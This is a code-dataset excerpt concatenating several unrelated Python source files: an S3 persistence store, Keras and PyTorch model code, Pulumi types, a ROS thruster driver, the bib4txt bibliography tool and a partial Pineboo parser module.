# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: <NAME> <<EMAIL>>
#
"""Implementation persistence store using S3."""
import logging
from rudra.data_store.aws import AmazonS3
from src.config.settings import SETTINGS, AWS_SETTINGS
logger = logging.getLogger(__name__)
class PersistenceStore:
"""Persistence store to save Bigquery Data, it uses AWS S3 as of now as data store."""
def __init__(self, s3_client=None):
"""Initialize DataProcessing object."""
self.s3_client = s3_client
if s3_client:
self.s3_client = s3_client
else:
self.s3_client = AmazonS3(
region_name=AWS_SETTINGS.s3_region,
bucket_name=AWS_SETTINGS.s3_bucket_name,
aws_access_key_id=AWS_SETTINGS.s3_access_key_id,
aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key,
local_dev=not SETTINGS.use_cloud_services
)
def update(self, data, bucket_name, filename='collated.json'):
"""Upload s3 bucket."""
# connect after creating or with existing s3 client
self.s3_client.connect()
if not self.s3_client.is_connected():
raise Exception('Unable to connect to s3.')
json_data = dict()
if self.s3_client.object_exists(filename):
logger.info('%s exists, updating it.', filename)
json_data = self.s3_client.read_json_file(filename)
if not json_data:
raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}')
json_data.update(data)
self.s3_client.write_json_file(filename, json_data)
logger.info('Updated file Succefully!')
| 1.96875 | 2 |
methods/model_n.py | behrouzsh/deepPhosAPI | 0 | 12796584 | <filename>methods/model_n.py
import functools
import itertools
import os
import random
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from sklearn import metrics
from sklearn import preprocessing
from sklearn.model_selection import train_test_split, KFold, cross_val_score
from keras.layers import Dense, Activation, Flatten, Dropout, Reshape
from keras.layers import Conv1D, Conv2D, MaxPooling2D
from keras.models import Sequential, Model
from keras.utils.np_utils import to_categorical
from keras import optimizers
from keras.optimizers import Adam, SGD
from keras.layers.normalization import BatchNormalization
from keras.regularizers import l2
import copy
def model_net(X_train1, X_train2, X_train3, y_train,
nb_epoch=60,weights=None):
nb_classes = 2
img_dim1 = X_train1.shape[1:]
img_dim2 = X_train2.shape[1:]
img_dim3 = X_train3.shape[1:]
##########parameters#########
init_form = 'RandomUniform'
learning_rate = 0.001
nb_dense_block = 1
nb_layers = 5
nb_filter = 32
growth_rate = 32
# growth_rate = 24
filter_size_block1 = 13
filter_size_block2 = 7
filter_size_block3 = 3
filter_size_ori = 1
dense_number = 32
dropout_rate = 0.2
dropout_dense = 0.3
weight_decay = 0.0001
nb_batch_size = 512
###################
# Construct model #
###################
from methods.phosnet import Phos
model = Phos(nb_classes, nb_layers, img_dim1, img_dim2, img_dim3, init_form, nb_dense_block,
growth_rate, filter_size_block1, filter_size_block2, filter_size_block3,
nb_filter, filter_size_ori,
dense_number, dropout_rate, dropout_dense, weight_decay)
# Model output
# choose optimazation
opt = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08)
# model compile
model.compile(loss='binary_crossentropy',
optimizer=opt,
metrics=['accuracy'])
# load weights#
if weights is not None:
model.load_weights(weights)
# model2 = copy.deepcopy(model)
model2 = model
model2.load_weights(weights)
for num in range(len(model2.layers) - 1):
model.layers[num].set_weights(model2.layers[num].get_weights())
if nb_epoch > 0 :
model.fit([X_train1, X_train2, X_train3], y_train, batch_size=nb_batch_size,
# validation_data=([X_val1, X_val2, X_val3, y_val),
# validation_split=0.1,
epochs= nb_epoch, shuffle=True, verbose=1)
return model
| 2.4375 | 2 |
models/MAF.py | mahkons/Dreamer | 0 | 12796585 | import torch
import torch.nn as nn
import torchvision.transforms as T
from .MADE import MADE
from .Shuffle import Shuffle
from .Flow import SequentialConditionalFlow
from .NormFunctions import ActNorm, RunningBatchNorm1d
from utils.logger import log
class MAF(nn.Module):
def __init__(self, flow_dim, condition_dim, hidden_dim, num_blocks, device):
super(MAF, self).__init__()
self.flow_dim = flow_dim
self.condition_dim = condition_dim
self.hidden_dim = hidden_dim
self.device = device
self.model = SequentialConditionalFlow(sum(
[[MADE(flow_dim, condition_dim, hidden_dim, ind == 0),
RunningBatchNorm1d(flow_dim), ActNorm(flow_dim), Shuffle(torch.randperm(flow_dim))] \
for ind in range(num_blocks - 1)] \
+ [[MADE(flow_dim, condition_dim, hidden_dim, False)]],
[]))
self.model.to(device)
self.prior = torch.distributions.Normal(torch.tensor(0., device=device),
torch.tensor(1., device=device))
self.initialized = True
def calc_loss(self, inputs, conditions):
raise NotImplementedError
def forward_flow(self, inputs, conditions):
in_shape = inputs.shape
inputs = inputs.reshape(-1, self.flow_dim)
conditions = conditions.reshape(inputs.shape[0], self.condition_dim)
if not self.initialized and inputs.shape[0] != 1: # hack todo fix?
with torch.no_grad():
self.model.data_init(inputs, conditions)
self.initialized = True
z, logjac = self.model.forward_flow(inputs, conditions)
return z.reshape(in_shape), logjac.reshape(in_shape[:-1])
def sample(self, conditions):
batch_size = conditions.shape[0]
with torch.no_grad():
z = self.prior.sample([batch_size, self.flow_dim])
x, _ = self.model.inverse_flow(z, conditions)
return x
def save(self, path):
torch.save({
"model": self.model.state_dict(),
"optimizer": self.optimizer.state_dict(),
}, path)
def load(self, path):
state_dict = torch.load(path, map_location=self.device)
self.model.load_state_dict(state_dict["model"])
self.optimizer.load_state_dict(state_dict["optimizer"])
"""
uniform noise to dequantize input
logit(a + (1 - 2a) * image) as in paper
"""
class MAFImageTransform():
def __init__(self, dataset):
if dataset == "mnist":
self.base_transform = T.Compose([T.ToTensor(), T.RandomHorizontalFlip()])
self.alpha = 0.01
else:
raise AttributeError("Unknown dataset")
def __call__(self, image):
image = self.base_transform(image)
noise = (torch.rand_like(image) - 0.5) * (1/256.)
image = (image + noise).clip(0., 1.)
return torch.logit(self.alpha + (1 - 2 * self.alpha) * image)
| 2.03125 | 2 |
sdk/python/pulumi_okta/profile/_inputs.py | brinnehlops/pulumi-okta | 0 | 12796586 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Dict, List, Mapping, Optional, Tuple, Union
from .. import _utilities, _tables
__all__ = [
'MappingMappingArgs',
]
@pulumi.input_type
class MappingMappingArgs:
def __init__(__self__, *,
expression: pulumi.Input[str],
id: pulumi.Input[str],
push_status: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "expression", expression)
pulumi.set(__self__, "id", id)
if push_status is not None:
pulumi.set(__self__, "push_status", push_status)
@property
@pulumi.getter
def expression(self) -> pulumi.Input[str]:
return pulumi.get(self, "expression")
@expression.setter
def expression(self, value: pulumi.Input[str]):
pulumi.set(self, "expression", value)
@property
@pulumi.getter
def id(self) -> pulumi.Input[str]:
return pulumi.get(self, "id")
@id.setter
def id(self, value: pulumi.Input[str]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="pushStatus")
def push_status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "push_status")
@push_status.setter
def push_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "push_status", value)
| 1.992188 | 2 |
deprecated/drivers/sub8_videoray_m5_thruster/nodes/thruster_driver.py | ericgorday/SubjuGator | 27 | 12796587 | #!/usr/bin/env python
import numpy as np
import copy
import rospy
import rospkg
import rosparam
import threading
import argparse
from geometry_msgs.msg import Vector3
from std_msgs.msg import Header, Float64
from sub8_msgs.msg import Thrust, ThrusterStatus
from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point
from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster
from sub8_thruster_comm import thruster_comm_factory
from ros_alarms import AlarmBroadcaster, AlarmListener
lock = threading.Lock()
class BusVoltageMonitor(object):
'''
Class that estimates sub8's thruster bus voltage.
As of May 2017, this is just a simple rolling average with a constant width sliding
window. However add_reading and get_estimate methods are left for when smarter
filtering is needed
'''
VMAX = 50 # volts
VMIN = 0 # volts
class VoltageReading(object):
def __init__(self, voltage, time):
self.v = voltage
self.t = time
def __init__(self, window_duration):
'''
window_duration - float (amount of seconds for which to keep a reading in the buffer)
'''
self.bus_voltage_alarm = AlarmBroadcaster("bus-voltage")
self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1)
self.warn_voltage = rospy.get_param("/battery/warn_voltage", 44.5)
self.kill_voltage = rospy.get_param("/battery/kill_voltage", 44.0)
self.last_estimate_time = rospy.Time.now()
self.WINDOW_DURATION = rospy.Duration(window_duration)
self.ESTIMATION_PERIOD = rospy.Duration(0.2)
self.cached_severity = 0
self.buffer = []
def add_reading(self, voltage, time):
''' Adds voltage readings to buffer '''
voltage = float(voltage)
# Only add if it makes sense (the M5's will give nonsense feedback at times)
if voltage >= self.VMIN and voltage <= self.VMAX:
self.buffer.append(self.VoltageReading(voltage, time))
self.prune_buffer()
# check bus voltage if enough time has passed
if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD:
self.check_bus_voltage()
def prune_buffer(self):
''' Removes readings older than the window_duration from buffer '''
for reading in self.buffer:
age = rospy.Time.now() - reading.t
if age > self.WINDOW_DURATION:
self.buffer.remove(reading)
def get_voltage_estimate(self):
''' Returns average voltage in buffer '''
voltages = []
if len(self.buffer) == 0:
return None
for r in self.buffer:
voltages.append(r.v)
return np.mean(voltages)
def check_bus_voltage(self):
''' Publishes bus_voltage estimate and raises alarm if necessary '''
bus_voltage = self.get_voltage_estimate()
if bus_voltage is None:
return
self.bus_voltage_pub.publish(Float64(bus_voltage))
severity = None
if bus_voltage < self.warn_voltage:
severity = 3
if bus_voltage < self.kill_voltage:
severity = 5
if severity is not None and self.cached_severity != severity:
self.bus_voltage_alarm.raise_alarm(
problem_description='Bus voltage has fallen to {}'.format(bus_voltage),
parameters={'bus_voltage': bus_voltage},
severity=severity
)
self.cached_severity = severity
class ThrusterDriver(object):
_dropped_timeout = 1.0 # s
_window_duration = 30.0 # s
_NODE_NAME = rospy.get_name()
def __init__(self, ports_layout, thruster_definitions):
'''Thruster driver, an object for commanding all of the sub's thrusters
- Gather configuration data and make it available to other nodes
- Instantiate ThrusterPorts, (Either simulated or real), for communicating with thrusters
- Track a thrust_dict, which maps thruster names to the appropriate port
- Given a command message, route that command to the appropriate port/thruster
- Send a thruster status message describing the status of the particular thruster
'''
self.failed_thrusters = set() # This is only determined by comms
self.deactivated_thrusters = set() # These will not come back online even if comms are good (user managed)
# Alarms
self.thruster_out_alarm = AlarmBroadcaster("thruster-out")
AlarmListener("thruster-out", self.check_alarm_status, call_when_raised=False) # Prevent outside interference
# Create ThrusterPort objects in a dict indexed by port name
self.load_thruster_ports(ports_layout, thruster_definitions)
# Feedback on thrusters (thruster mapper blocks until it can use this service)
self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info)
self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10)
for name in self.thruster_to_port_map.keys()}
# These alarms require this service to be available before things will work
rospy.wait_for_service("update_thruster_layout")
self.update_thruster_out_alarm()
# Bus voltage
self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration)
# Command thrusters
self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1)
# To programmatically deactivate thrusters
self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster)
self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster)
@thread_lock(lock)
def load_thruster_ports(self, ports_layout, thruster_definitions):
''' Loads a dictionary ThrusterPort objects '''
self.ports = {} # ThrusterPort objects
self.thruster_to_port_map = {} # node_id to ThrusterPort
rospack = rospkg.RosPack()
self.make_fake = rospy.get_param('simulate', False)
if self.make_fake:
rospy.logwarn("Running fake thrusters for simulation, based on parameter '/simulate'")
# Instantiate thruster comms port
for port_info in ports_layout:
port_name = port_info['port']
self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake)
# Add the thrusters to the thruster dict and configure if present
for thruster_name in port_info['thruster_names']:
self.thruster_to_port_map[thruster_name] = port_info['port']
if thruster_name not in self.ports[port_name].online_thruster_names:
rospy.logerr("ThrusterDriver: {} IS MISSING!".format(thruster_name))
else:
rospy.loginfo("ThrusterDriver: {} registered".format(thruster_name))
# Set firmware settings
port = self.ports[port_name]
node_id = thruster_definitions[thruster_name]['node_id']
config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' +
thruster_name + '.yaml')
rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name,
config_path))
port.set_registers_from_dict(node_id=node_id,
reg_dict=rosparam.load_file(config_path)[0][0])
port.reboot_thruster(node_id) # Necessary for some settings to take effect
def get_thruster_info(self, srv):
''' Get the thruster info for a particular thruster name '''
query_name = srv.thruster_name
info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name]
thruster_info = ThrusterInfoResponse(
node_id=info.node_id,
min_force=info.thrust_bounds[0],
max_force=info.thrust_bounds[1],
position=numpy_to_point(info.position),
direction=Vector3(*info.direction)
)
return thruster_info
def check_alarm_status(self, alarm):
# If someone else cleared this alarm, we need to make sure to raise it again
if not alarm.raised and alarm.node_name != self._NODE_NAME:
self.update_thruster_out_alarm()
def update_thruster_out_alarm(self):
'''
Raises or clears the thruster out alarm
Updates the 'offline_thruster_names' parameter accordingly
Sets the severity to the number of failed thrusters (clipped at 5)
'''
offline_names = list(self.failed_thrusters)
if len(self.failed_thrusters) > 0:
self.thruster_out_alarm.raise_alarm(
node_name=self._NODE_NAME,
parameters={'offline_thruster_names': offline_names},
severity=int(np.clip(len(self.failed_thrusters), 1, 5)))
else:
self.thruster_out_alarm.clear_alarm(
node_name=self._NODE_NAME,
parameters={'offline_thruster_names': offline_names})
@thread_lock(lock)
def command_thruster(self, name, thrust):
'''
Issue a a force command (in Newtons) to a named thruster
Example names are BLR, FLH, etc.
Raises RuntimeError if a thrust value outside of the configured thrust bounds is commanded
Raises UnavailableThrusterException if a thruster that is offline is commanded a non-zero thrust
'''
port_name = self.thruster_to_port_map[name]
target_port = self.ports[port_name]
thruster_model = target_port.thruster_info[name]
if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]:
rospy.logwarn('Tried to command thrust ({}) outside of physical thrust bounds ({})'.format(
thrust, thruster_model.thrust_bounds))
if name in self.failed_thrusters:
if not np.isclose(thrust, 0):
rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name + ')')
effort = target_port.thruster_info[name].get_effort_from_thrust(thrust)
# We immediately get thruster_status back
thruster_status = target_port.command_thruster(name, effort)
# Keep track of thrusters going online or offline
offline_on_port = target_port.get_offline_thruster_names()
for offline in offline_on_port:
if offline not in self.failed_thrusters:
self.failed_thrusters.add(offline) # Thruster went offline
for failed in copy.deepcopy(self.failed_thrusters):
if (failed in target_port.get_declared_thruster_names() and
failed not in offline_on_port and
failed not in self.deactivated_thrusters):
self.failed_thrusters.remove(failed) # Thruster came online
# Don't try to do anything if the thruster status is bad
if thruster_status is None:
return
message_contents = [
'rpm',
'bus_v',
'bus_i',
'temp',
'fault',
'command_tx_count',
'status_rx_count',
'command_latency_avg'
]
message_keyword_args = {key: thruster_status[key] for key in message_contents}
power = thruster_status['bus_v'] * thruster_status['bus_i']
self.status_publishers[name].publish(
ThrusterStatus(
header=Header(stamp=rospy.Time.now()),
name=name,
node_id=thruster_model.node_id,
power=power,
effort=effort,
thrust=thrust,
**message_keyword_args
)
)
# Will publish bus_voltage and raise alarm if necessary
self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now())
# Undervolt/overvolt faults are unreliable (might not still be true - David)
if message_keyword_args['fault'] > 2:
fault_codes = {
(1 << 0): 'UNDERVOLT',
(1 << 1): 'OVERRVOLT',
(1 << 2): 'OVERCURRENT',
(1 << 3): 'OVERTEMP',
(1 << 4): 'STALL',
(1 << 5): 'STALL_WARN',
}
fault = int(message_keyword_args['fault'])
faults = []
for code, fault_name in fault_codes.items():
if code & fault != 0:
faults.append(fault_name)
rospy.logwarn("Thruster: {} has entered fault with status {}".format(name, message_keyword_args))
rospy.logwarn("Fault causes are: {}".format(faults))
return
def thrust_cb(self, msg):
'''
Callback for receiving thrust commands
These messages contain a list of instructions, one for each thruster
If there are any updates to the list of failed thrusters, it will raise and alarm
'''
failed_before = {x for x in self.failed_thrusters}
for thrust_cmd in list(msg.thruster_commands):
self.command_thruster(thrust_cmd.name, thrust_cmd.thrust)
# Raise or clear 'thruster-out' alarm
if not self.failed_thrusters == failed_before:
rospy.logdebug('Failed thrusters:', self.failed_thrusters)
self.update_thruster_out_alarm()
def stop(self):
''' Commands 0 thrust to all thrusters '''
for port in self.ports.values():
for thruster_name in port.online_thruster_names.copy():
self.command_thruster(thruster_name, 0.0)
def fail_thruster(self, srv):
''' Makes a thruster unavailable for thrust allocation '''
# So that thrust is not allocated to the thruster
self.failed_thrusters.add(srv.thruster_name)
# So that it won't come back online even if comms are good
self.deactivated_thrusters.add(srv.thruster_name)
# So that thruster_mapper updates the B-matrix
self.update_thruster_out_alarm()
return {}
def unfail_thruster(self, srv):
''' Undoes effect of self.fail_thruster '''
self.failed_thrusters.remove(srv.thruster_name)
self.deactivated_thrusters.remove(srv.thruster_name)
self.update_thruster_out_alarm()
return {}
if __name__ == '__main__':
PKG = 'sub8_videoray_m5_thruster'
usage_msg = "Interface to Sub8's VideoRay M5 thrusters"
desc_msg = "Specify a path to the configuration.json file containing the thrust calibration data"
parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg)
args = parser.parse_args(rospy.myargv()[1:])
rospy.init_node('videoray_m5_thruster_driver')
layout_parameter = '/thruster_layout'
rospy.loginfo("Thruster Driver waiting for parameter, {}".format(layout_parameter))
thruster_layout = wait_for_param(layout_parameter)
if thruster_layout is None:
raise IOError('/thruster_layout rosparam needs to be set before launching the thruster driver')
thruster_driver = ThrusterDriver(thruster_layout['thruster_ports'], thruster_layout['thrusters'])
rospy.spin()
| 2.515625 | 3 |
scripts/bib4txt.py | cpitclaudel/bibstuff | 9 | 12796588 | <filename>scripts/bib4txt.py
#!/usr/bin/env python
# bib4txt.py
"""
Creates formatted references for a text document.
Uuseful for reStructuredText documents.
Interacts with a Bibtex-style database file
(without using LaTeX or bibtex).
Dependencies:
- Python 2.4 or higher
- SimpleParse (binaries available!)
- BibStuff (which you should have if you have this)
The source text file should include citation references in reStructuredText format:
http://docutils.sourceforge.net/docs/user/rst/quickref.html#citations
Roughly: a citation key enclosed in brackets, followed by an underscore.
Citation keys cannot be all digits.
The source document can be output with formatted citation references substituted for the citation keys.
In this case, the reference list is added to the end of the file.
A slight modification of the reStructuredText ``cite`` directive is currently allowed:
- Most characters are permitted.
E.g., ``[Schwilk+Isaac:2006]_`` is now (2008) legal in reST and will be recognized by bib4txt.
- Comma separted multiple keys are permitted in a cite: e.g., ``[Schwilk1999,Isaac2000]_``
This is *not* legal reST.
The intent is for the formatted references to be written to a separate file.
You can then include this in your reST document with an ``include`` directive.
How it works:
- Uses SimpleParse_ to convert an EBNF_ grammar into an object for scanning reST files for citation references.
- Uses SimpleParse_ to convert an EBNF_ grammar into an object for scanning .bib files. (See Bibstuff's bibgrammar.py.)
- Extracts the citation references from the input document.
- Outputs a sorted list of citation definitions, to be used in the References section of your documents.
:author: <NAME>
:date: 2006-07-27
:contact: http://www.american.edu/cas/econ/faculty/isaac/isaac1.htm
:copyright: 2006 by <NAME>
:license: MIT (see `license.txt`_)
:note: now allows multiple database (.bib) files
:note: bib4txt supercedes addrefs.py, by <NAME>
:note: Python 2.4 dependencies: sets, sorted
:note: Python 2.6 dependencies: with
:TODO: address the TODOs in the associate BibStuff files, especially in bibstyles/shared.py
.. _EBNF: http://www.garshol.priv.no/download/text/bnf.html
.. _SimpleParse: http://simpleparse.sourceforge.net/
.. _`license.txt`: ../license.txt
"""
__docformat__ = "restructuredtext en"
__version__ = "1.1.4"
__needs__ = '2.7+'
################### IMPORTS ##################################################
#import from standard library
import importlib, os, sys
import logging
logging.basicConfig(format='\n%(levelname)s:\n%(message)s\n')
bib4txt_logger = logging.getLogger('bibstuff_logger')
#import dependencies
import simpleparse
#local imports
try:
from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp
except ImportError: #hack to allow user to run without installing
scriptdir = os.path.dirname(os.path.realpath(__file__))
bibdir = os.path.dirname(scriptdir)
sys.path.insert(0, bibdir)
from bibstuff import bibfile, bibgrammar, bibstyles, ebnf_sp
################################################################################
################### GLOBALS ##################################################
# some globals are set when this file is run as a script
# style
# bibfile_processor
# note that the standard separator for multiple keys in one citation reference is a comma
# CITATION_SEP = ','
# set in styles/shared.py
def make_text_output(src_as_string,
src_parser,
parsed_bibfile,
style, # imported style module
citations_only=True):
"""Create intext citations and the bibliography"""
#first: create a citation manager to handle the bibfile(s)
bib4txt_logger.debug('create citation manager')
citation_manager = style.CitationManager([parsed_bibfile],
citekeys=None,
citation_template=style.CITATION_TEMPLATE)
#second: create CiteRefProcessor object to process cites during src parsing
# (and associate it with the citation_manager)
bib4txt_logger.debug('create cite processor')
cite_processor = bibstyles.shared.CiteRefProcessor(citation_manager)
#third: parse the text (ignore `taglist`; it is a dummy container)
bib4txt_logger.info('fill cite processor with keys')
taglist = src_parser.parse(src_as_string, processor=cite_processor)
"""
:note: Now cite_processor.all_citekeys holds the cite keys.
It is also associated with citation_manager which holds the bibliography,
so we can make a sorted entry list. To do so need:
- the keys for the citations referenced
- a sort-key on which to base the sorting
:note: Sorting is style dependent---e.g., might sort entries on citation_rank.
"""
#set the citation manager citekeys to all found keys (an ordered list)
#citation_manager.citekeys = cite_processor.all_citekeys
#make the citation definitions for a list of References
bib4txt_logger.info('make citations')
result = citation_manager.make_citations()
#lastly, prepend the entire document, if desired
if not citations_only:
result = cite_processor.__repr__() + result
return result+'\n' # ds added newline 2008-06-27
################################################################################
def bibfiles2string(bibfile_names):
bibfiles_as_strings = list()
for bibfile_name in bibfile_names:
if (os.path.splitext(bibfile_name)[-1]).lower() != ".bib":
bib4txt_logger.warning("%s does not appear to be a .bib file."%bibfile_name )
try:
with open(bibfile_name,'r') as fh:
bibfiles_as_strings.append( fh.read() )
except IOError:
bib4txt_logger.warning("%s not found."%bibfile_name )
return '\n'.join( bibfiles_as_strings )
def main():
"""Command-line tool. See bib4txt.py -h for help.
"""
#set default input and output
_infile = sys.stdin
_outfile = sys.stdout
from argparse import ArgumentParser
_usage = """
usage: %(prog)s [options] BIB_DATABASE
standard usage: %(prog)s -i reST_FILE -n -o refs_FILE BIB_DATABASE
"""
parser = ArgumentParser(usage=_usage)
parser.add_argument('--version', action='version', version=__version__)
parser.add_argument("-i", "--infile", action="store", dest="infile",
help="Parse FILE for citation references.", metavar="FILE")
parser.add_argument("-o", "--outfile", action="store", dest="outfile",
help="Write formatted references to FILE", metavar="FILE")
parser.add_argument("-n", "--nuke", action="store_true", dest="overwrite", default=False,
help="silently overwrite outfile, default=%(default)s")
parser.add_argument("-F", "--stylefile", action="store",
dest="stylefile", default="default.py",
help="Specify user-chosen style file",metavar="FILE")
parser.add_argument("-s", "--style", action="store",
dest="style", default="default",
help="Specify user-chosen style (by style name).")
#parser.add_argument("-v", "--verbose", action="store_true", dest="verbose", default=False, help="Print INFO messages to stdout, default=%(default)s")
parser.add_argument("-V", "--verbosity", action="store", type=int, dest="verbosity", default=0,
help="2: print DEBUG messages; 1: print INFO messages; default=%(default)s")
parser.add_argument("-a", "--all", action="store_true", dest="entire_doc", default=False,
help="Output entire document, making citation reference substitutions, default=%(default)s")
parser.add_argument("-x", "--xp", action="store_true", dest="xp_parse",
default=False, help="Use experimental document parser, default=%(default)s")
parser.add_argument("-L", "--logger-level", action="store", type=int, dest="logger_level",
help="Set logging level to integer value.")
parser.add_argument("bibfiles", action="store", nargs='*',
help="The .bib files for the references.")
args = parser.parse_args()
if args.logger_level:
bib4txt_logger.setLevel(args.logger_level)
elif 2==args.verbosity:
bib4txt_logger.setLevel(logging.DEBUG)
elif 1==args.verbosity:
bib4txt_logger.setLevel(logging.INFO)
if args.stylefile != "default.py":
bib4txt_logger.info("It is currently recommended to pass styles with the -s option.")
stylename = os.path.splitext(args.stylefile)[0]
else:
stylename = args.style
if "." in stylename:
bib4txt_logger.warn("use the -f option to pass a style by filename")
stylename = os.path.splitext(stylename)[0]
bib4txt_logger.info(
"\n".join([
"Script running:",
" bibfiles=%s",
" infile=%s",
" outfile=%s",
" style=%s"
])%(args.bibfiles, args.infile, args.outfile, stylename)
)
#import a bibliography style based on `stylefile` command-line option
#TODO: add error handling for unknown styles
style = importlib.import_module('bibstuff.bibstyles.%s'%stylename)
"""
str2exec = "import bibstuff.bibstyles.%s as style"%stylename
workaround = {} #work around Python 2 exec vs Python 3 exec
exec(str2exec, {}, workaround)
style = workaround['style']
#exec("import bibstuff.bibstyles.%s as style"%os.path.splitext(args.stylefile)[0])
"""
# open output file for writing (default: stdout)
if args.outfile:
if os.path.exists(args.outfile) and not args.overwrite:
_msg = """ABORTED because output file %s already exists:
Use -n option to nuke (overwrite) this file.
PLEASE CHECK FILE NAME CAREFULLY!
"""%(args.outfile)
print(_msg)
sys.exit(1)
_outfile = open(args.outfile,'w')
# read database (.bib) files
bibfile_names = args.bibfiles
bibfile_as_string = bibfiles2string(bibfile_names)
if not bibfile_as_string:
bib4txt_logger.warning("No BibTeX databases found.")
sys.exit(1)
# read input file (default: stdin)
if args.infile:
try:
_infile = open(args.infile, mode='r', encoding='utf-8')
except TypeError: #Python 2 did not accept encoding arg
_infile = open(args.infile, mode='r')
except:
raise ValueError("Cannot open: "+args.infile)
if args.entire_doc:
ebnf_dec = ebnf_sp.cites_rest
else:
ebnf_dec = ebnf_sp.cites_only_rest
if args.xp_parse:
ebnf_dec = ebnf_sp.cites_xp
# Create a simpleparse.parser Parser based on the chosen grammar
cite_parser = simpleparse.parser.Parser(ebnf_dec, root='src')
# create object to store parsed .bib file
bibfile_processor = bibfile.BibFile()
bib4txt_logger.debug('Ready to parse bib file.')
#store parsed .bib files in the bibfile_processor
bibgrammar.Parse(bibfile_as_string, bibfile_processor)
bib4txt_logger.info('bib file parsed.')
result = make_text_output(
_infile.read(),
cite_parser,
bibfile_processor,
style,
citations_only = not args.entire_doc)
_outfile.write(result)
_outfile.close()
_infile.close()
if __name__ == '__main__':
main()
| 2.53125 | 3 |
pineboolib/flparser/postparse.py | Miguel-J/pineboo-buscar | 0 | 12796589 | <reponame>Miguel-J/pineboo-buscar<filename>pineboolib/flparser/postparse.py<gh_stars>0
#!/usr/bin/python
from builtins import str
from builtins import object
from optparse import OptionParser
import os
import os.path
import sys
import imp
import traceback
from lxml import etree
try:
from pineboolib.flparser import flscriptparse
except ImportError:
import flscriptparse
USEFUL_TOKENS = "ID,ICONST,FCONST,SCONST,CCONST,RXCONST".split(",")
KNOWN_PARSERS = {}
UNKNOWN_PARSERS = {}
def parse_for(*tagnames):
global KNOWN_PARSERS
def decorator(fn):
for n in tagnames:
KNOWN_PARSERS[n] = fn
return fn
return decorator
def parse(tagname, treedata):
global KNOWN_PARSERS, UNKNOWN_PARSERS
if tagname not in KNOWN_PARSERS:
UNKNOWN_PARSERS[tagname] = 1
fn = parse_unknown
else:
fn = KNOWN_PARSERS[tagname]
return fn(tagname, treedata)
def getxmltagname(tagname):
if tagname == "source":
return "Source"
if tagname == "funcdeclaration":
return "Function"
if tagname == "classdeclaration":
return "Class"
if tagname == "vardeclaration":
return "Variable"
return "Unknown.%s" % tagname
xml_class_types = []
class TagObjectFactory(type):
def __init__(cls, name, bases, dct):
global xml_class_types
xml_class_types.append(cls)
super(TagObjectFactory, cls).__init__(name, bases, dct)
class TagObject(object, metaclass=TagObjectFactory):
tags = []
set_child_argn = False
name_is_first_id = False
debug_other = True
adopt_childs_tags = []
omit_tags = ['empty']
callback_subelem = {}
promote_child_if_alone = False
@classmethod
def tagname(self, tagname):
return self.__name__
@classmethod
def can_process_tag(self, tagname):
return tagname in self.tags
def __init__(self, tagname):
self.astname = tagname
self.xml = etree.Element(self.tagname(tagname))
self.xmlname = None
self.subelems = []
self.values = []
if self.name_is_first_id:
self.xml.set("name", "")
def adopt_children(self, argn, subelem):
for child in subelem.xml.iterchildren():
if self.set_child_argn:
child.set("argn", str(argn))
else:
if 'argn' in child.attrib:
del child.attrib['argn']
self.xml.append(child)
def omit_subelem(self, argn, subelem):
return
def is_in(self, listobj):
return self.__class__ in listobj or self.astname in listobj
def get(self, listobj, default=None):
if self.__class__ in listobj:
return listobj[self.__class__]
if self.astname in listobj:
return listobj[self.astname]
return default
def add_subelem(self, argn, subelem):
if subelem.is_in(self.omit_tags):
return self.omit_subelem(argn, subelem)
if subelem.is_in(self.adopt_childs_tags):
return self.adopt_children(argn, subelem)
callback = subelem.get(self.callback_subelem)
if callback:
return getattr(self, callback)(argn, subelem)
if self.set_child_argn:
subelem.xml.set("argn", str(argn))
self.xml.append(subelem.xml)
self.subelems.append(subelem)
def add_value(self, argn, vtype, value):
self.values.append((vtype, value))
if vtype == "ID" and self.name_is_first_id and self.xmlname is None:
self.xmlname = value
self.xml.set("name", value)
return
self.xml.set("arg%02d" % argn, vtype + ":" + repr(value))
def add_other(self, argn, vtype, data):
if self.debug_other:
self.xml.set("arg%02d" % argn, vtype)
def polish(self):
if self.promote_child_if_alone:
if len(self.values) == 0 and len(self.subelems) == 1:
return self.subelems[0]
return self
class ListObject(TagObject):
set_child_argn = False
debug_other = False
class NamedObject(TagObject):
